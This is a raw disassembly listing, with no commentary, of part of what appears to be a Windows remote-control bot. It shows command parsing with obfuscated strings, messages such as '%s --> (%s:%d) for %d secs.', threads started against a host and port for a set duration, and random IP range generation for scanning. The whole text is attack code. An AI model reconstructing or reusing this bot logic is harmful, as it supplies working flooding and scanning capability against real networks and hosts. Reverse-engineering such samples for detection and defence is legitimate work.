call sub_427B4E
pop ecx
test eax, eax
pop ecx
jz loc_414995
loc_413962: ; CODE XREF: sub_40A9FE+8F12�j
; sub_40A9FE+8F46�j
cmp [ebp+arg_68], 0
jz loc_413A99
push offset dword_43D664
push dword ptr [ebx+8]
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jnz short loc_41399C
push offset a? ; "?"
push dword ptr [ebx+8]
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jnz short loc_41399C
push offset dword_457CF8
jmp loc_413A42
; ---------------------------------------------------------------------------
loc_41399C: ; CODE XREF: sub_40A9FE+8F7F�j
; sub_40A9FE+8F92�j
push offset dword_457CF8
jmp loc_413A55
; ---------------------------------------------------------------------------
loc_4139A6: ; CODE XREF: sub_40A9FE+8F09�j
push dword ptr [ebx+4]
push offset aWrlthN3uh_1 ; "WRlth/n3Uh.1"
call edi ; dword_437178
test eax, eax
jnz loc_413A68
cmp [ebp+arg_C], eax
jz short loc_413A0D
push offset dword_43D664
push dword ptr [ebx+8]
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jnz short loc_4139F6
push offset a? ; "?"
push dword ptr [ebx+8]
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jnz short loc_4139F6
push offset dword_457C40
push dword ptr [ebx+8]
call edi ; dword_437178
test eax, eax
jz short loc_413A0D
jmp loc_414995
; ---------------------------------------------------------------------------
loc_4139F6: ; CODE XREF: sub_40A9FE+8FD0�j
; sub_40A9FE+8FE3�j
push offset dword_457C40
push dword ptr [ebx+8]
call sub_427B4E
pop ecx
test eax, eax
pop ecx
jz loc_414995
loc_413A0D: ; CODE XREF: sub_40A9FE+8FBD�j
; sub_40A9FE+8FF1�j
cmp [ebp+arg_68], 0
jz loc_413A99
push offset dword_43D664
push dword ptr [ebx+8]
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jnz short loc_413A50
push offset a? ; "?"
push dword ptr [ebx+8]
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jnz short loc_413A50
push offset dword_457C40
loc_413A42: ; CODE XREF: sub_40A9FE+87DE�j
; sub_40A9FE+893B�j ...
push dword ptr [ebx+8]
call edi ; dword_437178
loc_413A47: ; CODE XREF: sub_40A9FE+8BF8�j
test eax, eax
loc_413A49: ; CODE XREF: sub_40A9FE+8DD0�j
; sub_40A9FE+8E03�j ...
jnz short loc_413A99
jmp loc_414995
; ---------------------------------------------------------------------------
loc_413A50: ; CODE XREF: sub_40A9FE+902A�j
; sub_40A9FE+903D�j
push offset dword_457C40
loc_413A55: ; CODE XREF: sub_40A9FE+8FA3�j
push dword ptr [ebx+8]
loc_413A58: ; CODE XREF: sub_40A9FE+87FD�j
call sub_427B4E
pop ecx
loc_413A5E: ; CODE XREF: sub_40A9FE+8AB4�j
pop ecx
loc_413A5F: ; CODE XREF: sub_40A9FE+9099�j
test eax, eax
loc_413A61: ; CODE XREF: sub_40A9FE+8AF2�j
; sub_40A9FE+8AFA�j
jz short loc_413A99
jmp loc_414995
; ---------------------------------------------------------------------------
loc_413A68: ; CODE XREF: sub_40A9FE+8FB4�j
push dword ptr [ebx+4]
push offset aYqjsn0wtutn1 ; "yQJsn0wtUtn1"
call edi ; dword_437178
test eax, eax
jnz loc_413C4C
cmp [ebp+arg_C], eax
mov eax, dword_456DA8
mov [ebp+arg_8], 2
jz short loc_413A93
test eax, eax
jz loc_414995
loc_413A93: ; CODE XREF: sub_40A9FE+908B�j
cmp [ebp+arg_68], 0
jnz short loc_413A5F
loc_413A99: ; CODE XREF: sub_40A9FE+87A9�j
; sub_40A9FE+890A�j ...
mov edi, [ebp+arg_8]
mov eax, [ebx+edi*4]
test eax, eax
jnz short loc_413AE1
cmp [ebp+arg_14], eax
mov edi, offset aSS_1 ; "%s %s"
mov ebx, offset aFoabg1acvfoOsd ; "fOaBg1ACVfo/osdpb1E0v95."
jnz short loc_413ACC
cmp [ebp+arg_18], eax
jnz short loc_413AD6
push ebx
push offset aPtami1_agv ; "PTaMI1/.aGV/"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 14h
loc_413ACC: ; CODE XREF: sub_40A9FE+90B2�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_413AD6: ; CODE XREF: sub_40A9FE+90B7�j
push ebx
push offset aPtami1_agv ; "PTaMI1/.aGV/"
jmp loc_40C891
; ---------------------------------------------------------------------------
loc_413AE1: ; CODE XREF: sub_40A9FE+90A3�j
push eax
lea eax, [ebp+var_C130]
push offset aS_5 ; "%s"
push eax
call sub_429B03
add esp, 0Ch
jmp short loc_413B27
; ---------------------------------------------------------------------------
loc_413AF8: ; CODE XREF: sub_40A9FE+912D�j
mov eax, [ebx+edi*4]
test eax, eax
jz short loc_413B27
push eax
lea eax, [ebp+var_6DBB0]
push offset aS_1 ; " %s"
push eax
call sub_429B03
lea eax, [ebp+var_6DBB0]
push eax
lea eax, [ebp+var_C130]
push eax
call sub_42A5E0
add esp, 14h
loc_413B27: ; CODE XREF: sub_40A9FE+90F8�j
; sub_40A9FE+90FF�j
inc edi
cmp edi, [ebp+arg_4]
jl short loc_413AF8
mov al, [ebp+var_C130]
cmp al, byte_4439A0
jz short loc_413B74
cmp [ebp+arg_14], 0
mov ebx, offset aSFailedToParse ; "%s Failed to parse command."
jnz short loc_413B60
cmp [ebp+arg_18], 0
jnz short loc_413B6A
push offset aPtami1_agv ; "PTaMI1/.aGV/"
push ebx
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 10h
loc_413B60: ; CODE XREF: sub_40A9FE+9146�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_413B6A: ; CODE XREF: sub_40A9FE+914C�j
push offset aPtami1_agv ; "PTaMI1/.aGV/"
jmp loc_40D2C8
; ---------------------------------------------------------------------------
loc_413B74: ; CODE XREF: sub_40A9FE+913B�j
lea eax, [ebp+var_C130]
xor edi, edi
push eax
call sub_4293A0
test eax, eax
pop ecx
jbe short loc_413BE8
loc_413B87: ; CODE XREF: sub_40A9FE+91E8�j
lea eax, [ebp+edi+var_C130]
cmp byte ptr [eax], 5Fh
jnz short loc_413BA0
cmp [ebp+edi+var_C131], 20h
jnz short loc_413BA0
mov byte ptr [eax], 2Dh
loc_413BA0: ; CODE XREF: sub_40A9FE+9193�j
; sub_40A9FE+919D�j
cmp byte ptr [eax], 2Bh
jnz short loc_413BB2
cmp [ebp+edi+var_C131], 20h
jnz short loc_413BB2
mov byte ptr [eax], 5Fh
loc_413BB2: ; CODE XREF: sub_40A9FE+91A5�j
; sub_40A9FE+91AF�j
cmp byte ptr [eax], 5Eh
jnz short loc_413BC4
cmp [ebp+edi+var_C131], 20h
jnz short loc_413BC4
mov byte ptr [eax], 2Bh
loc_413BC4: ; CODE XREF: sub_40A9FE+91B7�j
; sub_40A9FE+91C1�j
cmp byte ptr [eax], 60h
jnz short loc_413BD6
cmp [ebp+edi+var_C131], 20h
jnz short loc_413BD6
mov byte ptr [eax], 5Eh
loc_413BD6: ; CODE XREF: sub_40A9FE+91C9�j
; sub_40A9FE+91D3�j
lea eax, [ebp+var_C130]
inc edi
push eax
call sub_4293A0
cmp edi, eax
pop ecx
jb short loc_413B87
loc_413BE8: ; CODE XREF: sub_40A9FE+9187�j
xor ebx, ebx
mov edi, offset aSShouldRunS_ ; "%s Should run: \"%s\"."
cmp [ebp+arg_20], ebx
jz short loc_413C14
cmp [ebp+arg_18], ebx
jnz short loc_413C19
lea eax, [ebp+var_C130]
push eax
push offset aPtami1_agv ; "PTaMI1/.aGV/"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 14h
loc_413C14: ; CODE XREF: sub_40A9FE+91F4�j
cmp [ebp+arg_18], ebx
jz short loc_413C33
loc_413C19: ; CODE XREF: sub_40A9FE+91F9�j
lea eax, [ebp+var_C130]
push eax
push offset aPtami1_agv ; "PTaMI1/.aGV/"
push edi
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CDD4
add esp, 14h
loc_413C33: ; CODE XREF: sub_40A9FE+9219�j
push ebx
lea eax, [ebp+var_C130]
push [ebp+arg_14]
push [ebp+arg_10]
push esi
push eax
call sub_40A935
jmp loc_41479B
; ---------------------------------------------------------------------------
loc_413C4C: ; CODE XREF: sub_40A9FE+9076�j
xor eax, eax
mov edi, offset aPtami1_agv ; "PTaMI1/.aGV/"
cmp [ebp+arg_14], eax
mov ebx, offset aSFailedToParse ; "%s Failed to parse command."
jnz loc_40D2BD
cmp [ebp+arg_18], eax
jnz loc_40D2C7
cmp [ebp+arg_20], eax
jz loc_414995
jmp loc_40D2AD
; ---------------------------------------------------------------------------
loc_413C78: ; CODE XREF: sub_40A9FE+85FB�j
; sub_40A9FE+8604�j
mov edi, offset aPtami1_agv ; "PTaMI1/.aGV/"
jmp loc_41475B
; ---------------------------------------------------------------------------
loc_413C82: ; CODE XREF: sub_40A9FE+6BC2�j
; sub_40A9FE+6BD3�j ...
xor eax, eax
cmp [ebx+4], eax
jz loc_413E98
cmp [ebx+8], eax
jz loc_413E98
cmp [ebx+0Ch], eax
jz loc_413E98
cmp [ebx+10h], eax
jz loc_413E98
push 0Dh
call sub_423800
cmp eax, 32h
pop ecx
mov [ebp+arg_C], eax
jle short loc_413CFC
cmp [ebp+arg_14], 0
mov ebx, offset aJqrlpUxr08Qqdu ; "JQrlp/UXr08/qqduw/ZeDHN/N/Wda.tYScO0znN"...
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_413CE4
cmp [ebp+arg_18], 0
jnz short loc_413CEE
push eax
push ebx
push offset aBvygm_afzkh0 ; "BVYGm.aFzkh0"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 18h
loc_413CE4: ; CODE XREF: sub_40A9FE+92C8�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_413CEE: ; CODE XREF: sub_40A9FE+92CE�j
push [ebp+arg_C]
push ebx
loc_413CF2: ; CODE XREF: sub_40A9FE+9482�j
push offset aBvygm_afzkh0 ; "BVYGm.aFzkh0"
jmp loc_41491C
; ---------------------------------------------------------------------------
loc_413CFC: ; CODE XREF: sub_40A9FE+92B8�j
mov eax, [ebp+arg_14]
mov [ebp+var_1D80], eax
mov eax, [ebp+arg_18]
mov [ebp+var_1D84], eax
test eax, eax
lea eax, [ebp+var_1E18]
jnz short loc_413D1D
push dword ptr [esi+0Ch]
jmp short loc_413D1F
; ---------------------------------------------------------------------------
loc_413D1D: ; CODE XREF: sub_40A9FE+9318�j
push dword ptr [esi]
loc_413D1F: ; CODE XREF: sub_40A9FE+931D�j
push eax
call dword_4370B4 ; lstrcpyA
mov eax, [ebp+arg_10]
push 7Fh
mov [ebp+var_1F1C], eax
push dword ptr [ebx+4]
lea eax, [ebp+var_1F18]
push eax
call sub_429D10
push dword ptr [ebx+8]
call sub_42A100
mov [ebp+var_1D94], eax
push dword ptr [ebx+0Ch]
call sub_42A100
mov [ebp+var_1D90], eax
push dword ptr [ebx+10h]
call sub_42A100
add esp, 18h
cmp eax, 1
mov [ebp+var_1D8C], eax
jge short loc_413D81
mov edi, offset aBvygm_afzkh0 ; "BVYGm.aFzkh0"
loc_413D77: ; CODE XREF: sub_40A9FE+6F4A�j
; sub_40A9FE+7476�j ...
mov ebx, offset aSNoDelay_ ; "%s No delay."
jmp loc_40D2A1
; ---------------------------------------------------------------------------
loc_413D81: ; CODE XREF: sub_40A9FE+9372�j
push 7Fh
lea eax, [ebp+var_1E98]
push dword ptr [ebx]
push eax
call sub_429D10
xor eax, eax
cmp [ebp+arg_60], eax
setnz al
mov [ebp+var_1D88], eax
push dword ptr [ebx+0Ch]
call sub_42A100
add esp, 10h
push eax
push dword ptr [ebx+8]
call sub_42A100
pop ecx
push eax
push dword ptr [ebx+4]
push offset aBvygm_afzkh0 ; "BVYGm.aFzkh0"
push offset aSSDForDSecs__0 ; "%s --> (%s:%d) for %d secs."
push 0Dh
call sub_4234A7
add esp, 18h
mov [ebp+var_1D98], eax
push dword ptr [ebx]
push offset aUbqs_hzpkh1 ; "/uBQS.HZPkh1"
call edi ; dword_437178
test eax, eax
jz short loc_413E0A
push dword ptr [ebx]
push offset a6x7zf1eztny_ ; "6x7zf1EztnY."
call edi ; dword_437178
test eax, eax
jz short loc_413E0A
push dword ptr [ebx]
push offset aFyflu0ji3xh_ ; "FyFlU0jI3XH."
call edi ; dword_437178
test eax, eax
jz short loc_413E0A
push dword ptr [ebx]
push offset a7otcu0fic6v0 ; "7otcU0FiC6V0"
call edi ; dword_437178
test eax, eax
jnz loc_414995
loc_413E0A: ; CODE XREF: sub_40A9FE+93DF�j
; sub_40A9FE+93EC�j ...
lea eax, [ebp+arg_0]
xor ebx, ebx
push eax
lea eax, [ebp+var_1F1C]
push ebx
push eax
push offset sub_422E10
push ebx
push ebx
call dword_437180 ; CreateThread
mov ecx, [ebp+var_1D98]
mov edi, offset aSSD_ ; "%s %s (%d)."
imul ecx, 2724h
cmp eax, ebx
mov ebx, dword_437170
mov dword_46D72C[ecx], eax
jnz short loc_413E8D
cmp [ebp+arg_14], 0
jnz short loc_413E6E
cmp [ebp+arg_18], 0
jnz short loc_413E78
call ebx ; dword_437170
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push offset aBvygm_afzkh0 ; "BVYGm.aFzkh0"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 18h
loc_413E6E: ; CODE XREF: sub_40A9FE+944C�j
; sub_40A9FE+9498�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_413E78: ; CODE XREF: sub_40A9FE+9452�j
call ebx ; dword_437170
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
jmp loc_413CF2
; ---------------------------------------------------------------------------
loc_413E85: ; CODE XREF: sub_40A9FE+9496�j
push 32h
call dword_437190 ; Sleep
loc_413E8D: ; CODE XREF: sub_40A9FE+9446�j
cmp [ebp+var_1D7C], 0
jz short loc_413E85
jmp short loc_413E6E
; ---------------------------------------------------------------------------
loc_413E98: ; CODE XREF: sub_40A9FE+9289�j
; sub_40A9FE+9292�j ...
mov edi, offset aBvygm_afzkh0 ; "BVYGm.aFzkh0"
jmp loc_41475B
; ---------------------------------------------------------------------------
loc_413EA2: ; CODE XREF: sub_40A9FE+6435�j
; sub_40A9FE+6446�j ...
xor eax, eax
cmp [ebx+4], eax
jz loc_414756
cmp [ebx+8], eax
jz loc_414756
cmp [ebx+0Ch], eax
jz loc_414756
push 8
call sub_423800
push dword ptr [ebx+4]
mov [ebp+arg_C], eax
call sub_42A100
add eax, [ebp+arg_C]
pop ecx
pop ecx
cmp eax, 1C2h
jle short loc_413F20
loc_413EDD: ; CODE XREF: sub_40A9FE+5EAE�j
xor ebx, ebx
mov edi, offset aSSD_ ; "%s %s (%d)."
cmp [ebp+arg_14], ebx
jnz short loc_413F0A
cmp [ebp+arg_18], ebx
jnz short loc_413F13
push [ebp+arg_C]
push offset aJqrlpUxr08Qqdu ; "JQrlp/UXr08/qqduw/ZeDHN/N/Wda.tYScO0znN"...
push offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 18h
loc_413F0A: ; CODE XREF: sub_40A9FE+94E9�j
cmp [ebp+arg_18], ebx
jz loc_414995
loc_413F13: ; CODE XREF: sub_40A9FE+94EE�j
push [ebp+arg_C]
push offset aJqrlpUxr08Qqdu ; "JQrlp/UXr08/qqduw/ZeDHN/N/Wda.tYScO0znN"...
jmp loc_410D53
; ---------------------------------------------------------------------------
loc_413F20: ; CODE XREF: sub_40A9FE+94DD�j
push dword ptr [ebx]
xor eax, eax
mov [ebp+var_4], eax
mov [ebp+var_1C], eax
push offset aSxytb1_eejq_ ; "SXYtb1.EEjQ."
mov [ebp+var_28], eax
mov dword ptr [ebp+var_14], eax
mov [ebp+var_24], eax
mov [ebp+var_18], eax
mov [ebp+var_20], eax
mov dword ptr [ebp+var_C+4], eax
call edi ; dword_437178
test eax, eax
jnz short loc_413F56
mov eax, dword_43A8C8
mov [ebp+var_4], 1
mov [ebp+arg_8], eax
loc_413F56: ; CODE XREF: sub_40A9FE+9547�j
push dword ptr [ebx]
push offset aVb1r0N_arr0 ; "vB1r0/N.Arr0"
call edi ; dword_437178
test eax, eax
jnz short loc_413F72
mov eax, dword_43A8CC
mov [ebp+var_1C], 1
mov [ebp+arg_8], eax
loc_413F72: ; CODE XREF: sub_40A9FE+9563�j
push dword ptr [ebx]
push offset a8im6i__c829_ ; "8Im6i..C829."
call edi ; dword_437178
test eax, eax
jnz short loc_413F8E
mov eax, dword_43A8D0
mov [ebp+var_28], 1
mov [ebp+arg_8], eax
loc_413F8E: ; CODE XREF: sub_40A9FE+957F�j
push dword ptr [ebx]
push offset aTiyj208fhvn_ ; "tIYj208FHvN."
call edi ; dword_437178
test eax, eax
jnz short loc_413FAA
mov eax, dword_43A8D4
mov dword ptr [ebp+var_14], 1
mov [ebp+arg_8], eax
loc_413FAA: ; CODE XREF: sub_40A9FE+959B�j
push dword ptr [ebx]
push offset a5ngN0zjh2i1 ; "5nG/N0ZJh2i1"
call edi ; dword_437178
test eax, eax
jnz short loc_413FC6
mov eax, dword_43A8D8
mov [ebp+var_24], 1
mov [ebp+arg_8], eax
loc_413FC6: ; CODE XREF: sub_40A9FE+95B7�j
push dword ptr [ebx]
push offset aMdf9n0kzpx60 ; "mdf9n0kzPX60"
call edi ; dword_437178
test eax, eax
jnz short loc_413FE2
mov eax, dword_43A8DC
mov [ebp+var_18], 1
mov [ebp+arg_8], eax
loc_413FE2: ; CODE XREF: sub_40A9FE+95D3�j
push dword ptr [ebx]
push offset aAtfv_jgk0x1 ; "/ATfv.jgK0X1"
call edi ; dword_437178
test eax, eax
jnz short loc_413FFE
mov eax, dword_43A8E0
mov [ebp+var_20], 1
mov [ebp+arg_8], eax
loc_413FFE: ; CODE XREF: sub_40A9FE+95EF�j
push dword ptr [ebx]
push offset aFu6k10irsc1 ; "fu6k10iRsc/1"
call edi ; dword_437178
test eax, eax
jnz short loc_41401A
mov eax, dword_43A8E4
mov dword ptr [ebp+var_C+4], 1
mov [ebp+arg_8], eax
loc_41401A: ; CODE XREF: sub_40A9FE+960B�j
push 8
call sub_423800
push dword ptr [ebx+4]
mov [ebp+arg_C], eax
call sub_42A100
add eax, [ebp+arg_C]
pop ecx
pop ecx
mov edi, offset aSSD_ ; "%s %s (%d)."
cmp eax, 1C2h
jle short loc_414086
cmp [ebp+arg_14], 0
jnz short loc_414065
cmp [ebp+arg_18], 0
jnz short loc_41406B
push [ebp+arg_C]
push offset aJqrlpUxr08Qqdu ; "JQrlp/UXr08/qqduw/ZeDHN/N/Wda.tYScO0znN"...
push offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 18h
loc_414065: ; CODE XREF: sub_40A9FE+9643�j
cmp [ebp+arg_18], 0
jz short loc_414086
loc_41406B: ; CODE XREF: sub_40A9FE+9649�j
push [ebp+arg_C]
push offset aJqrlpUxr08Qqdu ; "JQrlp/UXr08/qqduw/ZeDHN/N/Wda.tYScO0znN"...
push offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
push edi
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CDD4
add esp, 18h
loc_414086: ; CODE XREF: sub_40A9FE+963D�j
; sub_40A9FE+966B�j
and [ebp+arg_68], 0
cmp [ebp+arg_8], 0
jle loc_414995
loc_414094: ; CODE XREF: sub_40A9FE+9C32�j
push dword ptr [ebx+4]
call sub_42A100
cdq
idiv [ebp+arg_8]
mov [ebp+var_BC], eax
push dword ptr [ebx+4]
call sub_42A100
cdq
idiv [ebp+arg_8]
pop ecx
pop ecx
cmp eax, 64h
jle short loc_4140C3
mov [ebp+var_BC], 64h
loc_4140C3: ; CODE XREF: sub_40A9FE+96B9�j
push dword ptr [ebx+8]
call sub_42A100
cmp eax, 1
pop ecx
mov [ebp+var_D0], eax
jnb short loc_4140E0
xor eax, eax
inc eax
mov [ebp+var_D0], eax
loc_4140E0: ; CODE XREF: sub_40A9FE+96D7�j
push 3
pop ecx
cmp eax, ecx
jbe short loc_4140ED
mov [ebp+var_D0], ecx
loc_4140ED: ; CODE XREF: sub_40A9FE+96E7�j
push dword ptr [ebx+0Ch]
call sub_42A100
cmp eax, 270Fh
pop ecx
mov [ebp+var_CC], eax
jbe short loc_41410D
mov [ebp+var_CC], 270Fh
loc_41410D: ; CODE XREF: sub_40A9FE+9703�j
mov eax, [ebp+arg_14]
or [ebp+var_B8], 0FFFFFFFFh
and [ebp+arg_C], 0
cmp dword_43A378, 0
mov dword_454A48, eax
mov eax, [ebp+arg_20]
mov dword_454A4C, eax
mov eax, [ebp+arg_18]
mov dword_454A50, eax
jz loc_41427C
mov [ebp+arg_4], offset aD1 ; "d1"
loc_414144: ; CODE XREF: sub_40A9FE+985C�j
cmp [ebp+var_4], 0
jz short loc_414167
mov eax, [ebp+arg_68]
shl eax, 4
add eax, offset dword_43A7C8
push eax
push [ebp+arg_4]
call dword_437178 ; lstrcmpiA
test eax, eax
jz loc_414262
loc_414167: ; CODE XREF: sub_40A9FE+974A�j
cmp [ebp+var_1C], 0
jz short loc_41418A
mov eax, [ebp+arg_68]
shl eax, 4
add eax, offset dword_43A7E8
push eax
push [ebp+arg_4]
call dword_437178 ; lstrcmpiA
test eax, eax
jz loc_414262
loc_41418A: ; CODE XREF: sub_40A9FE+976D�j
cmp [ebp+var_28], 0
jz short loc_4141AD
mov eax, [ebp+arg_68]
shl eax, 4
add eax, offset dword_43A808
push eax
push [ebp+arg_4]
call dword_437178 ; lstrcmpiA
test eax, eax
jz loc_414262
loc_4141AD: ; CODE XREF: sub_40A9FE+9790�j
cmp dword ptr [ebp+var_14], 0
jz short loc_4141D0
mov eax, [ebp+arg_68]
shl eax, 4
add eax, offset dword_43A828
push eax
push [ebp+arg_4]
call dword_437178 ; lstrcmpiA
test eax, eax
jz loc_414262
loc_4141D0: ; CODE XREF: sub_40A9FE+97B3�j
cmp [ebp+var_24], 0
jz short loc_4141EF
mov eax, [ebp+arg_68]
shl eax, 4
add eax, offset dword_43A848
push eax
push [ebp+arg_4]
call dword_437178 ; lstrcmpiA
test eax, eax
jz short loc_414262
loc_4141EF: ; CODE XREF: sub_40A9FE+97D6�j
cmp [ebp+var_18], 0
jz short loc_41420E
mov eax, [ebp+arg_68]
shl eax, 4
add eax, offset dword_43A868
push eax
push [ebp+arg_4]
call dword_437178 ; lstrcmpiA
test eax, eax
jz short loc_414262
loc_41420E: ; CODE XREF: sub_40A9FE+97F5�j
cmp [ebp+var_20], 0
jz short loc_41422D
mov eax, [ebp+arg_68]
shl eax, 4
add eax, offset dword_43A888
push eax
push [ebp+arg_4]
call dword_437178 ; lstrcmpiA
test eax, eax
jz short loc_414262
loc_41422D: ; CODE XREF: sub_40A9FE+9814�j
cmp dword ptr [ebp+var_C+4], 0
jz short loc_41424C
mov eax, [ebp+arg_68]
shl eax, 4
add eax, offset dword_43A8A8
push eax
push [ebp+arg_4]
call dword_437178 ; lstrcmpiA
test eax, eax
jz short loc_414262
loc_41424C: ; CODE XREF: sub_40A9FE+9833�j
add [ebp+arg_4], 40h
inc [ebp+arg_C]
mov eax, [ebp+arg_4]
cmp dword ptr [eax+30h], 0
jnz loc_414144
jmp short loc_41427C
; ---------------------------------------------------------------------------
loc_414262: ; CODE XREF: sub_40A9FE+9763�j
; sub_40A9FE+9786�j ...
mov eax, [ebp+arg_C]
mov ecx, eax
mov [ebp+var_B8], eax
shl ecx, 6
mov ecx, dword_43A378[ecx]
mov [ebp+var_D4], ecx
loc_41427C: ; CODE XREF: sub_40A9FE+9739�j
; sub_40A9FE+9862�j
xor ecx, ecx
cmp [ebp+var_D4], ecx
jnz short loc_4142CE
cmp [ebp+arg_14], ecx
jnz short loc_4142A8
cmp [ebp+arg_18], ecx
jnz short loc_4142B2
push offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
push offset aSInvalidPort_ ; "%s Invalid port."
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 10h
loc_4142A8: ; CODE XREF: sub_40A9FE+988B�j
cmp [ebp+arg_18], 0
jz loc_414627
loc_4142B2: ; CODE XREF: sub_40A9FE+9890�j
push offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
push offset aSPortInvalid_ ; "%s Port invalid."
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CDD4
add esp, 10h
jmp loc_414627
; ---------------------------------------------------------------------------
loc_4142CE: ; CODE XREF: sub_40A9FE+9886�j
mov eax, [ebx+10h]
cmp eax, ecx
jz loc_414360
push eax
push offset aX_x_x_x ; "x.x.x.x"
call dword_437178 ; lstrcmpiA
test eax, eax
jnz short loc_414331
call dword_437188 ; GetTickCount
push eax
call sub_429B8F
pop ecx
loc_4142F6: ; CODE XREF: sub_40A9FE+990B�j
call sub_429B9C
cdq
mov ecx, 0E1h
idiv ecx
add edx, 4
cmp edx, 7Fh
jz short loc_4142F6
push edx
push offset aD_x_x_x ; "%d.x.x.x"
lea eax, [ebp+var_164]
push 10h
push eax
call sub_429BBE
add esp, 10h
loc_414322: ; CODE XREF: sub_40A9FE+9ADD�j
; sub_40A9FE+9AE5�j ...
mov [ebp+var_A8], 1
jmp loc_414514
; ---------------------------------------------------------------------------
loc_414331: ; CODE XREF: sub_40A9FE+98E9�j
push dword ptr [ebx+10h]
lea eax, [ebp+var_164]
push 10h
push eax
call sub_429BBE
push 78h
push dword ptr [ebx+10h]
call sub_42B1A0
add esp, 14h
neg eax
sbb eax, eax
neg eax
loc_414355: ; CODE XREF: sub_40A9FE+9A5B�j
mov [ebp+var_A8], eax
jmp loc_414514
; ---------------------------------------------------------------------------
loc_414360: ; CODE XREF: sub_40A9FE+98D5�j
cmp [ebp+arg_64], ecx
jnz short loc_4143B1
cmp [ebp+arg_54], ecx
jnz short loc_41437D
cmp [ebp+arg_58], ecx
jnz short loc_41437D
cmp [ebp+arg_5C], ecx
jnz short loc_41437D
cmp [ebp+arg_60], ecx
jz loc_41470A
loc_41437D: ; CODE XREF: sub_40A9FE+996A�j
; sub_40A9FE+996F�j ...
mov ecx, [ebp+arg_10]
lea eax, [ebp+var_40]
push eax
lea eax, [ebp+var_80]
push eax
mov [ebp+var_40], 10h
call sub_41DB68
push eax
call dword_456EB8 ; getsockname
cmp [ebp+arg_54], 0
jz loc_41445E
and [ebp+var_7C], 0FFh
jmp loc_414475
; ---------------------------------------------------------------------------
loc_4143B1: ; CODE XREF: sub_40A9FE+9965�j
cmp [ebp+arg_54], ecx
jz short loc_4143BF
mov [ebp+arg_C], 1
jmp short loc_4143DD
; ---------------------------------------------------------------------------
loc_4143BF: ; CODE XREF: sub_40A9FE+99B6�j
cmp [ebp+arg_58], ecx
jz short loc_4143CD
mov [ebp+arg_C], 2
jmp short loc_4143DD
; ---------------------------------------------------------------------------
loc_4143CD: ; CODE XREF: sub_40A9FE+99C4�j
cmp [ebp+arg_5C], ecx
jz loc_414711
mov [ebp+arg_C], 3
loc_4143DD: ; CODE XREF: sub_40A9FE+99BF�j
; sub_40A9FE+99CD�j
push offset byte_454A54
push offset dword_457C40
call dword_437178 ; lstrcmpiA
test eax, eax
jz short loc_414400
push offset dword_457C40
call sub_41E4C1
test eax, eax
pop ecx
jz short loc_414429
loc_414400: ; CODE XREF: sub_40A9FE+99F1�j
mov ecx, [ebp+arg_10]
call sub_41DB58
mov ecx, [ebp+arg_10]
push eax
call sub_41CF25
push 2710h
push eax
mov [ebp+arg_4], eax
call dword_43707C ; WaitForSingleObject
push [ebp+arg_4]
call dword_437044 ; CloseHandle
loc_414429: ; CODE XREF: sub_40A9FE+9A00�j
push [ebp+arg_C]
push [ebp+arg_60]
push offset dword_457C40
call sub_401F54
add esp, 0Ch
test eax, eax
jz loc_414995
push 10h
push eax
lea eax, [ebp+var_164]
push eax
call sub_429D10
mov eax, [ebp+arg_60]
add esp, 0Ch
jmp loc_414355
; ---------------------------------------------------------------------------
loc_41445E: ; CODE XREF: sub_40A9FE+99A1�j
cmp [ebp+arg_58], 0
jz short loc_41446B
and word ptr [ebp+var_7C+2], 0
jmp short loc_414475
; ---------------------------------------------------------------------------
loc_41446B: ; CODE XREF: sub_40A9FE+9A64�j
cmp [ebp+arg_5C], 0
jz short loc_414475
and byte ptr [ebp+var_7C+3], 0
loc_414475: ; CODE XREF: sub_40A9FE+99AE�j
; sub_40A9FE+9A6B�j ...
push 10h
push [ebp+var_7C]
call dword_456FDC ; inet_ntoa
push eax
lea eax, [ebp+var_164]
push eax
call sub_429D10
add esp, 0Ch
cmp [ebp+arg_60], 0
jz short loc_41450D
xor eax, eax
cmp [ebp+arg_54], eax
mov [ebp+arg_4], eax
jz short loc_4144A9
mov [ebp+arg_4], 3
jmp short loc_4144C3
; ---------------------------------------------------------------------------
loc_4144A9: ; CODE XREF: sub_40A9FE+9AA0�j
cmp [ebp+arg_58], eax
jz short loc_4144B7
mov [ebp+arg_4], 2
jmp short loc_4144C3
; ---------------------------------------------------------------------------
loc_4144B7: ; CODE XREF: sub_40A9FE+9AAE�j
cmp [ebp+arg_5C], eax
jz short loc_4144C3
mov [ebp+arg_4], 1
loc_4144C3: ; CODE XREF: sub_40A9FE+9AA9�j
; sub_40A9FE+9AB7�j ...
lea eax, [ebp+var_164]
push 30h
push eax
call sub_42B060
and byte ptr [ebp+arg_C+3], 0
